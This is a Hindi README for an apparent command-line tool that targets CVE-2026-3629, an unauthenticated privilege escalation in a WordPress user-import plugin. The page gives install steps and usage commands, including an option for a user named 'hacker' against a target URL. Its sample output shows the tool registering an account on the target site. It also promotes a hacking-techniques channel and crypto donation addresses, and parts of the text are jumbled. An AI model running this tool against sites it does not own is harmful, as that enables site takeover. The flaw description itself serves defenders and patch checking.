
वर्डप्रेस विशेषाधिकार वृद्धि जाँचक
"Import and export users and customers" वर्डप्रेस प्लगइन में गंभीर विशेषाधिकार वृद्धि भेद्यता CVE-2026-3629 का पता लगाने के लिए एक कमांड-लाइन उपकरण।
नवीनतम सुरक्षा उपकरणों, भेद्यताओं और हैकिंग तकनीकों के साथ अपडेट रहें!
👉 चैनल: @PySecTools
विवरण: प्लगइन का save_extra_user_profile_fields फ़ंक्शन उपयोगकर्ता मेटा कुंजियों को प्रतिबंधित करने में विफल रहता है। wp_capabilities कुंजी को ब्लॉक नहीं किया गया है, जिससे बिना प्रमाणीकरण वाले हमलावर व्यवस्थापक (Administrator) विशेषाधिकार प्राप्त कर सकते हैं।
प्रभावित संस्करण: ≤ 1.29.7 (1.29.8+ में ठीक किया गया)
शोषण हेतु पूर्वापेक्षाएँ (दोनों आवश्यक):
wp_capabilities कॉलम वाली CSV आयात की गई होप्रभाव: पूर्ण व्यवस्थापक पहुँच, साइट पर कब्ज़ा, दुर्भावनापूर्ण प्लगइन इंस्टॉलेशन।
खोजकर्ता: Supanat Konprom | प्रकटीकरण: 21 मार्च, 2026
git clone https://github.com/PySecTools/CVE-2026-3629-Checker.git
cd CVE-2026-3629-Checker
pip install requests colorama
python3 cve_2026_3629_checker.py <URL> [OPTIONS]
| कमांड | विवरण |
|---|---|
python3 cve_2026_3629_checker.py http://example.com |
╔══════════════════════════════════════════════════════╗
║ WordPress Privilege Escalation Checker ║
║ Single Target Mode ║
╚══════════════════════════════════════════════════════╝
════════════════════════════════════════
Target: http://vulnerable-site.com
════════════════════════════════════════
[✓] VULNERABLE! User 'test_username' created successfully!
[+] URL: http://vulnerable-site.com
════════════════════════════════════════
[✓] RESULT: VULNERABLE ✓
════════════════════════════════════════
[✗] SAFE (Registration is blocked/disabled)
════════════════════════════════════════
[✗] RESULT: NOT VULNERABLE ✗
════════════════════════════════════════
केवल शैक्षिक और अधिकृत परीक्षण के लिए। उपयोग केवल उन्हीं सिस्टम पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की लिखित अनुमति आपके पास है। अनधिकृत उपयोग अवैध है।
USDT (TRC20): TNia5W6TameZ81y6FaSU3RhefYPnFDBZou
USDT (BSC - BEP20): 0x494f424e34840b21597ad75fc092a8d200655257
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।
⭐ यदि इस रिपॉज़िटरी ने आपकी मदद की तो इसे स्टार दें!
| विशेषता | मान |
|---|
| CVE ID | CVE-2026-3629 |
| CVSS स्कोर | 8.1 (उच्च) |
| आक्रमण वेक्टर | नेटवर्क |
| आवश्यक विशेषाधिकार | कोई नहीं |
| CWE | CWE-269 (अनुचित विशेषाधिकार प्रबंधन) |
| डिफ़ॉल्ट सेटिंग्स के साथ चलाएँ |
python3 cve_2026_3629_checker.py http://example.com -u hacker -e [email protected] | कस्टम उपयोगकर्ता नाम और ईमेल |
python3 cve_2026_3629_checker.py http://example.com -t 15 | टाइमआउट 15 सेकंड पर सेट करें |
python3 cve_2026_3629_checker.py https://target.com -u admin -e [email protected] -t 20 | पूर्ण विकल्प |
| तर्क | डिफ़ॉल्ट | विवरण |
|---|
url | आवश्यक | लक्षित WordPress URL |
-u, --username | test_username | परीक्षण उपयोगकर्ता नाम |
-e, --email | [email protected] | परीक्षण ईमेल |
-t, --timeout | 30 | सेकंड में टाइमआउट |